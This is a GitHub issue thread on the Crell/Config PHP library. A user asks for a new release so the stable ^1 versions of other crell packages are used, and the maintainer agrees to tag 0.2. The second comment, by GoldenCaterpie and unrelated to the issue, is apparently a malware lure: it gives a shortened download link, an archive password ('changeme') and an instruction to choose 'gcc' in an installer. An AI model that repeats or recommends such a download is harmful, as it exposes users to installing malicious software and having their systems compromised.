### ISSUE TITLE
Tag a new release to allow stable (^1) versions of other "crell/*" packages

### ISSUE THREAD

**Issue by JanWennrich** [Crell/Config#8]
Hey there,

running `composer outdated` on a project that uses `crell/config` outputs the following warning:

```
Transitive dependencies not required in composer.json:
crell/attributeutils 0.8.2 1.2.0 A robust, flexible attribute handling framework
crell/fp             0.4.0 1.0.0 Functional utilities for PHP 8 and later
crell/serde          0.6.0 1.2.0 A general purpose serialization and deserialization library
```

Looking at the `composer.json` of `crell/config` in version `0.1.1` shows that the unstable versions (0.*) of those packages are required.

On the `master` branch the dependencies were already bumped to the stable versions (^1) with https://github.com/Crell/Config/commit/9d2f0d1ddcaf5196b7f52285ea38823834586afd.

It would be nice to have a version tagged with those stable versions (and probably all the other [new commits since the last release](https://github.com/Crell/Config/compare/0.1.1...master)).

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Crell** [comment]
Yeah, I ran into that myself recently when I started actually using this library myself. :smile: I didn't realize others were actually using it yet.  I'm not sure it's ready for a 1.0 release, but I can tag a 0.2 easily enough.
